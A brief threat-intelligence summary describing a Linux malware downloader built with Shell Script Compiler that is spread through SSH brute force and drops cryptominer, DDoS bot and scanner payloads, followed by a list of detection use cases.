Linux Malware Downloader Uses Shell Script Compiler for Cryptomining & DDoS

Category: Malware Campaign | Industry: Global | Level: Tactical | Source: ASEC

Researchers from the ASEC analysis team have identified a new Linux malware downloader using the Shell Script Compiler (SHC) to convert bash scripts into an ELF executable and leverage the converted script's RC4 encoding algorithm to evade detection. ASEC researchers were able to uncover the SHC loader from a VirusTotal submission made by a Korean user. Further tracking of the malware's submissions showed it's primarily used in attacks against systems in Korea. Threat actors are assessed to have brute force SSH servers in order to gain access to a targeted system, "It is presumed that after successful authentication through a dictionary attack on inadequately managed Linux SSH servers, various malware was installed on the target system." Malware payloads dropped from the script are archive files for XMRig CoinMiner, a DDoS IRC bot, or an SSH Scanner.

Anvilogic Scenario:

• Unix File Download, Modified, Executed

Anvilogic Use Cases:

• SSH Brute Force detection
• File Download (Unix)
• File Modified for Execution

‍